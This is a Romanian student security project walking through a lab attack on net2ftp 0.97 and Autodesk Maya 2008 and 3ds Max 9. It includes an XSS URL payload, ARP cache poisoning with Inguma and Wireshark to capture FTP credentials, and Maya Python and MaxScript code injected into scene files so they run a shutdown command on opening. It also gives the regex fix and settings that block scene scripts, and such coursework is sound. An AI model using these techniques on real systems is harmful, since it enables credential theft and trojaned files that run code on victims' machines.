Sunteți pe pagina 1din 20

- Proiect SSR -

Vulnerabilităţi şi exploit-uri
în aplicaţiile
Autodesk 3ds Max 9, Autodesk Maya 2008,
Net2Ftp 0.97

Student:
Hoşman Dan-Laurenţiu

2010
CUPRINS:

Cap. 1 Introducere ....................................................................... 3


1.1 Obiectivele proiectului .................................................................... 3

Cap. 2 Structura proiectului ......................................................... 4


2.1 Descrierea vulnerabilităţilor ............................................................ 4
2.2 Exploatarea sistemului .................................................................... 9
2.3 Dezvoltarea exploit-ului .................................................................. 12

Cap.3 Concluzii........................................................................... 19

Bibliografie............................................................................................ 20

2
Capitolul 1

Introducere

1.1 Obiectivele proiectului


Proiectul este realizat cu scopul de a exploata o vulnerabilitate în mai
multe programe ce utilizează platforma Windows XP (SP1, SP2 sau SP3) şi de
a genera exploituri pe baza acestor breşe de securitate. „Penetrarea” securităţii
va fi realizată în distribuţia Linux BackTrack v4.
Am ales platforma Windows XP Professional SP2 deoarece contine
destule brese de securitate + bug-uri. Multe dintre aceste probleme sunt fixate
in SP3 dar am ales acest Service Pack doar de a ilustra principiul de lucru al
exploitu-ului. Service Pack 2 a fost lansat in vara anului 2004.
Lansată în 2009, distribuţia Linux, BackTrack 4 este o distribuţie de top
pentru teste de penetrare şi auditare pentru securitatea informaţiei. Având sute
de unelte preinstalate şi configurate fără să funcţioneze fără alte operaţii
suplimentare de configurare, BackTrack 4 oferă o platformă solidă pentru teste
de penetrare - de la testarea aplicaţiilor Web până la auditarea RFID.
BackTrack este o distribuţie de Linux, folosită sub forma de Live CD (poate fi
şi instalată pe HDD) şi care a rezultat prin unirea a 2 teste de penetrare WHAX
şi Auditor Security Collection. BackTrack 4 permite utilizatorului să includă
scripturi custom, tool-uri adiţionale, kernel-uri configurabile în distribuţii
personalizate. Proiectul BackTrack a fost creat de Mati Ahoroni şi Max Moser
şi reprezintă un efort colaborativ din partea comunităţii.
Obiective:
- exploatarea vulnerabilităţii net2ftp <= 0.97 Cross-Site
Scripting/Request Forgery Vulnerabilities a fost raportată în data
09.04.2009, este remote, iar aplicaţia (net2ftp), este un client FTP Web şi poate
fi folosită atât pe platformă Windows cât şi pe platformă Linux.
- exploatarea vulnerabilităţii Autodesk Maya Script Nodes Arbitrary
Command Execution a fost raportată în data 23.11.2009, este remote, poate fi
exploatată şi local şi are impact asupra executării codului. Nu are încă generat
un exploit. Aplicaţia Autodesk Maya este utilizabilă atât pe platformă
Windows cât şi pe Linux (Red Hat Enterprise Linux 5.3 WS sau Fedora 8).
- exploatarea vulnerabilităţii Autodesk 3DS Max Application
Callbacks Arbitrary Command Execution, a fost raportată în aceeaşi
perioadă ca şi cea de sus, 23.11.2009 (de către Core Security), este remote şi
are impact asupra executării codului. Aplicaţia Autodesk 3ds Max se poate
utiliza numai pe sisteme Windows.

3
Capitolul 2

Structura proiectului

2.1 Descrierea vulnerabilităţilor


1. net2ftp
Titlu: net2ftp <= 0.97 Cross-Site Scripting/Request Forgery Vulnerabilities;
Data: 02.04.2009;
Clasa: vulnerabilităţi multiple;
Exploatată remote: Da;
Exploatată Local: Nu;
Versiuni afectate: net2ftp 0.97, net2ftp 0.95 şi net2ftp 0.98 beta;
Soluţii şi update-uri: producătorul nu a realizat un update / fix pentru
remedierea vulnerabilităţilor;
Exploit / Demonstrarea conceptului: Da;

Aplicatia net2ftp

În pachetul net2ftp, versiunea 0.98 beta şi precedentele, au fost găsite


multiple vulnerabilităţi: Cross-Site Scripting (XSS) şi Cross-Site Request
Forgery (CSRF).

Cross-Site Scripting (XSS) este un tip de vulnerabilitate în securitatea


calculatoarelor de obicei găsită în aplicaţii web care permit atacatorilor rău
intenţionaţi să injecteze scripturi în partea-client a paginii Web vizualizate de
către alţi utilizatori. O vulnerabilitate exploatată cu Cross-Site Scripting poate

4
fi folosită de atacatori pentru a ocoli controalele de acces cum ar fi politica de
aceeaşi origine (same origin policy). Cross-site scripting-urile efectuate pe site-
uri Web au fost aproximativ 80% din toate vulnerabilităţile de securitate
documentate de Symantec în 2007. Impactul lor poate varia de la un mic
inconvenient până la un risc semnificativ de securitate, în funcţie de
sensibilitatea datelor manipulate de site-ul vulnerabil, precum şi de natura
oricărei tehnici de securitate puse în aplicare de către proprietarul site-ului.
Atacurile CSRF le putem denumi ca atacurile ce se bazează pe nivelul
de încredere ce îl oferă un site, utilizatorului. Astfel, atacul vizează persoane cu
anumite drepturi pe website-urile vizate, atacurile fiind declanşate prin oferirea
unor link-uri ce ar trebui deschise de victimă, sau prin crearea unor link-uri /
imagini “malformate”, ce ar încărca acele pagini automat. Aceste atacuri există
de foarte multă vreme, în ultimii ani numărul lor crescând foarte mult. Putem
da ca exemplu Ebay, unde în 2008, aproape 18 milioane de clienţi au pierdut
datele confidenţiale ale contului.
Cross-Site Scripting (XSS):
Această vulnerabilitate este produsă de un “typo” în funcţia
validateGenericInput(), unde extragerea simbolurilor „<” şi “>” este un eşec
datorită faptului că expresia regulată care ar trebui să efectueze extragerea, este
invalidă. Mai jos putem observa liniile 1088 – 1102 din fişierul
registerglobals.inc.php, în care problema discutată apare la linia 1098.

+++includes/registerglobals.inc.php @@ 1088:1102
1088 function validateGenericInput($input) {
1089
1090 // --------------
1091 // Remove the following characters <>
1092 // --------------
1093
1094 // Remove XSS code
1095 // $input = RemoveXSS($input);
1096
1097 // Remove < >
1098 $input = preg_replace("/\\<\\>]/", "", $input);
1099
1100 return $input;
1101
1102 } // end validateGenericInput
---includes/registerglobals.inc.php
Această problemă poate fi uşor remediată prin adăugarea simbolului „[“
la modelul din linia 1098.
Corect: 1098 $input = preg_replace("/[\\<\\>]/", "", $input);

5
Cross-Site Request Forgery (CSRF):
Toate formele de aplicaţii Web sunt vulnerabile deoarece acestea nu
verifică nici un tip de “token” pentru a se asigura că user-ul a cerut o anumită
informaţie. Astfel, atacatorul poate păcăli utilizatorul să viziteze un Web-site
având o astfel de vulnerabilitate, şi apoi să realizeze diverse acţiuni pe server
cum ar fi crearea de fişiere, ştergerea / upload-ul / redenumirea etc.
2. Autodesk Maya
Titlu: Autodesk Maya Script Nodes Arbitrary Command Execution;
Data: 23.11.2009;
Clasa: Failure to Sanitize Data into a Different Plane [CWE-74];
Impact: execuţie de cod;
Exploatată remote: Da;
Exploatată Local: Nu;
Versiuni afectate: Autodesk Maya 2010, 2009, 2008, 8.5, 8.0;
Soluţii şi update-uri: fără soluţii din partea Autodesk;
Exploit / Demonstrarea conceptului: Da;

Autodesk Maya este un pachet software de înaltă calitate, profesionist,


pentru grafica 3D pe computer şi pentru modelarea 3D. Maya a fost lansată în
special pentru sistemele de operare IRIX [8], şi ulterior portată pe platformele
Windows, Linux şi Max OS X. Suportul pentru platforma IRIX a fost întrerupt
după versiunea 6.5, în octombrie 2005 când Autodesk a preluat compania
Alias, cea care dezvoltase software-ul Maya, Autodesk continuând apoi
dezvoltarea programului Maya. Ultima versiune lansată este Maya 2010 (10.5)
şi a fost lansată în 2009.
O componentă importantă în Maya o reprezintă deschiderea către
aplicaţii third-party, care pot schimba software-ul Maya complet faţă de
apariţia sa standard şi folosind numai kernel-ul o poate transforma într-o
versiune de software foarte customizabilă. Această trăsătură a făcut ca Maya să
fie folosită de studiouri mari de producţie, care tind să scrie coduri particulare
pentru propriul interes, folosind kit-ul software de dezvoltare (SDK) distribuit
de aplicaţie.
Maya deţine un TCL (Tool Command Language) denumit MEL (Maya
Embedded Language) asemănător unui script “cross-platform”, care oferă nu
numai un limbaj de script, ci şi mijloace de a modifica funcţiile de bază ale
aplicaţiei Maya (având în vedere că majoritatea tool-urilor şi a mediului sunt
scrise în limbajul MEL). Adiţional, interacţiunea utilizatorilor este
implementată şi înregistrată sub formă de script MEL, pe care apoi utilizatori îl
pot salva în fişiere sau în toolbar-uri, ajutând astfel artiştii în animaţie să
adauge funcţionalităţile fără a fi necesară o experienţă în C sau C++. Nucleul
aplicaţiei Maya este scris în C++, iar începând cu versiunea 8.5, Maya suportă
şi script-ul în Python.
Autodesk Maya oferă funcţia numită "Script Nodes" pentru a realiza un
mod de comportament al animaţiei folosind limbajele de programare MEL şi
Python. Formatele de fişiere Autodesk Maya, suportă cod sub formă de script

6
integrat ca o parte din pachetul scenei. Programele integrate în Maya sub formă
de script sunt în mod automat executate la deschiderea fişierului. Un atacator
poate prelua controlul unui sistem pe care Maya se află instalat prin trimiterea
unei scene special generate şi apoi îndrumarea spre deschiderea scenei. Script-
ul va rula cu privilegiile utilizatorului ce foloseşte aplicaţia Maya.
În mod default, Maya are activă opţiunea de a executa "Script Nodes",
iar pentru a preveni execuţia acestora atunci când deschidem o scenă (fişier
Maya - .ma sau .mb), se urmăresc paşii :
1. Select File / Open;
2. Turn off “Execute Script Nodes”;
3. Open scene.

2. Autodesk 3ds Max


Titlu: Autodesk 3DS Max Application Callbacks Arbitrary Command
Execution;
Data: 23.11.2009;
Clasa: Failure to Sanitize Data into a Different Plane [CWE-74];
Impact: execuţie de cod;
Exploatată remote: Da;
Exploatată Local: Nu;
Versiuni afectate: Autodesk Maya 2010, 2009, 2008, 9, 8, 7, 6;
Soluţii şi update-uri: fără soluţii din partea Autodesk;
Exploit / Demonstrarea conceptului: Da;

7
Autodesk 3ds Studio Max este un pachet de modelare, animaţie şi
randare folosit foarte des la dezvoltarea jocurilor video, a filmului, multimedia
şi contentului pentru web. Software-ul oferă un limbaj de scripting integrat, ce
permite utilizatorilor să lege coduri custom de acţiunile desfăşurate în scenă.
Executarea scripturilor nu necesită permisiunea utilizatorului. Acest mecanism
poate fi exploatat de un atacator pentru a executa cod arbitrar, prin îndemnarea
unei victime să deschidă o scena / fişier (.max) ce are script-ul inserat ca o
funcţie callback.
Limbajul integrat în Max, poartă numele de MaxScript şi poate fi folosit
pentru a automatiza task-urile repetitive, pentru a combina diferite funcţii
existente în noi moduri de utilizare sau pentru a dezvolta noi tool-uri şi
interfeţe pentru utilizator. Max permite utilizatorilor să lege un script de
funcţiile de callback ale aplicaţiei, în aşa fel încât un atacator poate profita de
această situaţie.
În modul default, Autodesk Max are active opţiunile de execuţie a
scripturilor, iar pentru a dezactiva încărcarea automată a scripturilor
MaxScripts, se urmăresc paşii:
1. Meniul Customize / Preferences /tab-ul Preferences Settings /
MaxScript;
2. deselectaţi "Load/Save Scene Scripts";
3. deselectaţi "Load/Save Persistent Globals".

8
2.2 Exploatarea sistemului
Considerăm un studio / companie de grafică 3D, ce deţine un server FTP
cu ajutorul căruia utilizatorii / angajaţii au acces la fişierele de lucru. Angajaţii
utilizează pentru conectarea la serverul de FTP, un client Web net2ftp. Studioul
efectuează modele 3D în aplicaţiile Autodesk Maya 2008 şi/sau Autodesk Max
9.
Un atacator poate profita atât de vulnerabilităţile clientului de FTP, cât
şi de vulnerabilităţile celor două aplicaţii Autodesk
Pentru realizarea exploit-ului vulnerabilităţilor discutate anterior este
nevoie de următoarele sisteme de operare, tool-uri şi maşini virtuale:
1. Windows XP Professional SP2, maşina victimă;
2. Aplicaţia Autodesk Maya 2008, instalată pe maşina victimă;
3. Aplicaţia Autodesk 3ds Max 9 , instalată pe maşina victimă;
4. Server FTP configurat cu ajutorul Microsoft’s IIS (Internet
Information Server) se pot utiliza şi alte tipuri de servere FTP,
dar vom discuta într-un paragraf următor.
5. Client FTP, net2ftp, bazat pe tehnologie web ;
6. Aplicaţia VirtualBox, pentru maşină virtuală;
7. Distribuţia Linux BackTrack 4 , maşină virtuală

Specificatiile masinii victima


Maşina victimă / vulnerabilă, Windows XP SP2, este configurata prin
dhcp, şi are un IP din clasa C, 192.168.1.104. Maşina atacatorului, este o

9
maşină virtuală, BackTrack 4 configurată tot cu ajutorul dhcp şi are un IP de
clasa C, 192.168.1.166. Ambele maşini se află în aceeaşi reţea, iar un router, cu
adresa IP 192.168.1.1, asigură serviciul DHCP şi DNS.
În continuare trebuie făcute următoarele precizări:
Aplicaţiile de grafica sunt instalate pe maşina victimă în mod default,
adică "Script Nodes" şi scripturile MaxScripts se execută.
La punctul 4, serverul FTP, este realizat cu ajutorul aplicaţiei oferite de
Windows Professional, care mai întâi trebui instalată, în cazul în care la
instalarea sistemului de operare Windows, pachetele ce îl conţin nu au fost
instalate. În acest caz, se urmează paşii:
1. Control Panel -> Add or Remove Programs -> Add/Remove
Windows Components;
2. se alege Internet Information Services (ISS), si se apasă Details;
3. se alege Common Files, File Transfer Protocol (FTP) Services şi
Internet Information Services Snap-In, iar restul se pot debifa;
4. se aşteaptă până se instalează toate componentele (CD-ul cu Windows
poate fi cerut);
5. pe partiţia C:\, a fost creat folder-ul Inetpub, care reprezintă serverul
FTP;
6. în C:\Inetpub\ftproot se găsesc fişierele şi directoarele care sunt
transferate cu ajutorul serverului de FTP;
7. sunt necesare unele configurări, înainte de a folosi serverul de FTP;
8. mergem Control Panel / Administrative Tools / Internet Information
Services;
9. se alege serverul de FTP iar cu click dreapta se alege meniul
Properties;
10. în primul tab, FTP Site, se stabileşte numele serverului, adresa IP şi
limitările conexiunii;
11. tab-ul 2, Security Accounts, este foarte important. Default serverul
FTP generează un cont IUSR_numecomputer, care are username-ul şi parola
aceeaşi cu cea a contului folosit pe sistemul de operare Windows XP SP2. Tot
default, serverul de FTP permite conexiuni de tip anonymous. Vom discuta şi
de posibilitatea în care serverul de FTP nu permite conexiuni de tip
anonymous.
12. tab-ul 3, Messages, stabileşte mesajele predefinite de întâmpinare;
13. ultimul tab, Home Directory, este responsabil cu asigurarea
directorului, default C:\Inetpub\ftproot şi asigură permisiunile asupra fişierelor
şi directoarelor.
14. acum serverul de FTP este funcţional şi se poate încerca conectarea
la acesta.
Observaţii:
Se pot utiliza şi alte servere de FTP, însă acestea nu sunt la îndemâna
tuturor utilizatorilor, deoarece sunt cu licenţă separată. Unele dintre acestea,
cum este cazul aplicaţiei Serv-U, oferă un mediu mai prietenos şi facilităţi mai
bune decât Internet Information Services de la Microsoft.

10
La punctul 5, se discută despre clientul de FTP. Acesta poate fi
configurat pe un server atât pe platforma Windows cât şi pe platforma Linux.
Se utilizează ghidul disponibil on-line pentru configurarea clientului de FTP pe
Linux.
Pe scurt, pe serverul de FTP, fişierele victimă pentru Maya se găsesc în
/maya/my_first_project/scenes şi poartă numele de vuln_maya.ma şi
vuln_maya.mb. Pentru Max, fişierul victimă se găseşte în
/3dsmax/scenes/vuln_max.max.
Realizarea cu succes a atacului este descrisă astfel:
1. atacatorul foloseşte distribuţia BackTrack, pentru a exploata
vulnerabilităţile clientului de net2ftp (au fost discutate anterior), şi obţine
un username şi o parolă pentru accesul la serverul de FTP, 192.168.1.104.
2. în cazul în care serverul utilizează tipul de conexiune cu user
anonymous, atunci se poate loga foarte simplu şi poate utiliza direct
exploit-urile XSS şi CSRF.
3. atacatorul se conectează pe serverul de FTP şi downloadează
cele două fişierele vulnerabile din /maya/my_first_project/scenes şi
fişierul din /3dsmax/scenes/, în care salvează un script periculos.
4. folosind credenţialele obţinute, atacatorul uploadează pe serverul
de FTP, fişierele modificate, care acum conţin o vulnerabilitate / risc de
securitate.
5. compania va suferi pierderi însemnate de date şi informaţii în
urma atacului. Un exemplu de vulnerabilitate este rularea script-ului de
shutdown –s –t 3

11
2.3 Dezvoltarea exploit-ului
În această secţiune se va descrie codul sursă pas cu pas. Trebuie
reamintit că în secţiunea precedentă am vorbit de configurarea server-ului de
FTP al companiei şi de modul său de funcţionare. S-a mai vorbit şi de
aplicaţiile vulnerabile şi tipurile de sisteme de operare folosite.

În maşina de BackTrack 4, configuram placa de reţea:


dhclient eth0
ifconfig eth0

12
Pornim interfaţa grafică:
startx
Într-un terminal, ne conectăm la serverul FTP victimă, de pe maşina
Windows:
ftp 192.168.1.104
Testăm dacă serverul de FTP permite conectarea cu user anonymous şi
parola parola@ceva.ro . În cazul în care autentificare a fost realizată,
atacatorul dispune de credenţiale pentru a utiliza vulnerabilitatea clientului de
FTP, net2ftp.
În cazul în care serverul FTP nu permite conectarea cu user anonymous
(serverul a fost configurat să nu permită astfel de conexiuni), atunci se
realizează un atac ARP Cache Poisoning, folosind exploit-ul din maşina
BackTrack 4. Acest atac este utilizat pentru interceptarea datelor de
autentificare într-o sesiune FTP. Mergem în directorul exploits şi lansăm tool-
ul Inguma:
cd /pentest/exploits/inguma
./inguma.py
Folosim tool-ul pentru a realiza atacul de tip ARP Cache Poisoning
scapy.arpcachepoison(“192.168.1.166”,”192.168.1.104”)

Deschidem un alt terminal şi pornim wireshark


wireshark

13
În wireshark se alege interfaţa eth0 pentru a captura pachetele, si se
apasă Start. Apoi în maşina victimă, Windows XP, se deschide o fereastră cmd,
şi se realizează o conexiune ftp la server, se introduce username-ul şi parola, iar
apoi se face deconectarea:
ftp 192.168.1.104
>ftp user: Dan
>ftp password:
quit
În maşina BackTrack, se opreşte captura de pachete cu wireshark şi se
sortează pachetele după protocolul TCP. Apoi în meniul Analyze se alege
opţiunea Follow TCP Stream, şi ne vor fi afişate credenţialele, user: Dan şi
parola: student.
Mai există şi o altă variantă. Putem folosi unealta Inguma pentru a
realiza un atac ARP Cache Poisoning direct asupra clientului de FTP, net2ftp.
Şi în acest mod putem afla credenţialele pentru conectarea la serverul de FTP,
192.168.1.104.
Următoarea etapă o reprezintă exploatarea vulnerabilităţii de tip XSS
asupra clientului de FTP, net2ftp 0.97. Numele serverului ftp este test. Vom
utiliza un link către acesta de forma:
http://ftp.test.com/?state=login_small&errormessage=<iframe
onload="alert(/voodoo/.source);">
Vulnerabilitatea de tip CSRF se realizează prin generarea unui script
php şi uploadarea lui pe serverul net2ftp, folosit de companie

14
vi csrf-attack.html
:wq
Vulnerabilitatea de tip CSRF + XSS, generează un atac de tip XSS în
secţiunea „Bookmark” a clientului net2ftp. Acest atac are o eficientă şi mai
mare în cazul în care utilizatorul salvează bookmark-ul. Metoda este
asemănătoare ca în cazul vulnerabilităţii de tip CSRF; se generează un script
php, ce conţine un cod pe care îl putem găsi în xss-xsrf-attack.html

vi xss-csrf-attack.html
:wq

15
Se pot obţine astfel informaţii importante despre serverul de FTP. După
exploatarea vulnerabilităţilor clientului de net2ftp, urmează conectarea la
serverul de FTP, utilizând credenţialele obţinute mai devreme. Într-un terminal
în maşina BackTrack, se face conexiunea la serverul de FTP:
ftp 192.168.1.104
Se introduce username-ul şi parola (Dan, student), şi apoi se listează
conţinutul serverului. Ajungem în folderele /maya/my_first_project/scenes şi
/3dsmax/scenes/ de unde se downloadează fişierele vuln_maya.ma,
vuln_maya.mb şi vuln_max.max:
ls -l
cd /maya/my_first_profect/scenes
ls -l
get vuln_maya.ma
get vuln_maya.mb
cd /3dsmax/scenes
ls -l
get vuln_max.max
După ce au fost salvate, începe editarea lor. Se deschide un alt terminal.
Pentru fişierul vuln_maya.ma introducerea script-ului este cea mai uşoară şi
rapidă. Script-ul este de forma:
python("import os");
python("os.system('%SystemRoot%\\system32\\shutdown –s –t
3')");

16
Se caută linia
createNode script -n "uiConfigurationScriptNode";
şi înainte de această linie se introduc următoarele comenzi

createNode expression -n "expression1";


setAttr -k on ".nds";
setAttr ".ixp" -type "string" "python(\"import os\");\r\n
python(\"os.system('%SystemRoot%\\\\system32\\\\shutdown -s -t 3')\");"
Apoi se salvează fişierul şi în primul terminal se uploadează pe serverul
de FTP:
vi vuln_maya.ma
:wq
cd /maya/my_first_project/scenes
put vuln_maya.ma

Pentru fişierul vuln_max.max nu putem realiza editarea deoarece fişierul


este criptat.

17
Exploatarea vulnerabilităţii se poate realiza local. Codul care se
introduce în MaxScript este de forma:
callbacks.addScript #filePostOpen ("DOSCommand(\"shutdown -s
-t 3\")")
id:#mbLoadCallback persistent:true

Apoi se salvează fişierul şi se uploadează pe server:


vi vuln_max.max
:wq
cd /3dsmax/scenes

put vuln_maya.mb

Exploatarea vulnerabilităţii celor două aplicaţii Autodesk constă în


faptul că se poate realiza comanda de shutdown pe maşina victimă. În cazul
aplicaţiei net2ftp, putem obţine controlul credenţialelor server-ului de FTP.

18
Capitolul 3

Concluzii

Rezultatele exploatării vulnerabilităţilor celor două aplicaţii Autodesk,


prezintă un potenţial periculos pentru utilizatorii acestora. Comanda de
shutdown are o influenţă destul de nefastă asupra utilizatorului, deoarece
timpul în care computerul se închide este foarte scurt şi oprirea forţată a
sistemului duce la pierderea datelor, crash-uri etc.
La o următoare deschidere a fişierului vuln_maya.ma, sistemul va fi din
nou compromis, iar utilizatorului îi va fi foarte greu să depisteze sursa acestui
comportament.
Bineînţeles că există metode mai eficiente şi mai periculoase din punct
de vedere al securităţii, iar atunci când un sistem este atacat, pentru ca un
atacator să preia controlul său, acesta profită de asemenea vulnerabilităţi ca
cele prezentate în acest proiect. Scopul acestor demonstraţii a fost pentru a
înţelege conceptul şi noţiunile de vulnerabilitate şi exploit.
În final, proiectul trebuie să dovedească cunoştinţele şi abilităţile în ceea
ce priveşte identificarea unei vulnerabilităţi, determinarea unei metode pentru a
genera un exploit şi utilizarea exploit-ului pentru a obţine acces la maşina
vulnerabilă.

19
Bibliografie

1 BackTrack http://en.wikipedia.org/wiki/BackTrack
4
2 Exploit http://www.exploit-db.com/
DataBase
3 Net2ftp http://www.net2ftp.com/
4 XSS http://en.wikipedia.org/wiki/Cross-site_scripting
5 CSRF http://www.tutoriale.far-php.ro/index.php?p=Cum%20sa%20te
%20protejezi%20de%20atacurile%20Cross-site%20request
%20forgery%20CSRF
6 Autodesk http://usa.autodesk.com/
7 IRIX http://en.wikipedia.org/wiki/IRIX
8 FTP Guide http://www.pcstats.com/articleview.cfm?articleid=1491&page=2
9 Net2ftp http://www.net2ftp.com/help.html?
Guide PHPSESSID=DbSU,9NYZjhDsdzFPbyxxk0VfI3

20

S-ar putea să vă placă și